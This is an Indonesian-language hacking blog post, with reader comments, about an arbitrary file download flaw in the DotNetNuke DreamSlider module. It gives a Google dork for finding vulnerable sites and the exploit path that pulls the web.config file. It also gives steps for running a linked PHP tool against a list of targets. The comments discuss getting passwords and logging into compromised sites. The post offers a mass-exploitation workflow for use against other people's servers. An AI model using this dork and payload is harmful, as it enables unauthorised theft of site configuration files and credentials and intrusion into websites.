dotNetNuke DreamSlider Arbitrary File Download

Saturday, 30 December 2017

Exploit Title: dotNetNuke DreamSlider Arbitrary File Download

Google Dork: inurl://DesktopModules/DreamSlider/
Exploit: /DesktopModules/DreamSlider/DownloadProvider.aspx?File=~/web.config

Reference: https://www.exploit-db.com/exploits/43405/ (MSF)

Tools: https://pastebin.com/NYNJctB4

------------------------------------------------------------------------

1. Masukan list target ke dalam file.txt

http://target.com/

http://target2.com/

2. Jalankan php exploit.php target.txt

Wiby said...: Bang Request google dorker dong yang kayak bing dorker itu sama yang grab all patch heheh; 12/30/2017 9:42 pm
Ronaldi said...: loginnya dimana ya gan?; 1/02/2018 5:35 pm
Yildiz Kiral said...: login.aspx coba aja; 2/02/2018 1:55 am
Anonymous said...: google dorker dah susah, kena captcha; 2/06/2018 11:35 am
Anonymous said...: coba di exploit ulng/jalanin toolsnya ulang; 2/06/2018 11:35 am
Tryo Asnafi said...: This comment has been removed by the author.; 2/10/2018 2:23 am
Tryo Asnafi said...: This comment has been removed by the author.; 2/10/2018 2:24 am
Tryo Asnafi said...: udah dapat password nya cuman kenapa ga bisa login kang ... itu masalah nya apa ?; 2/10/2018 2:43 am
GagakPutih said...: This comment has been removed by the author.; 2/24/2018 4:15 pm

Saturday, 30 December 2017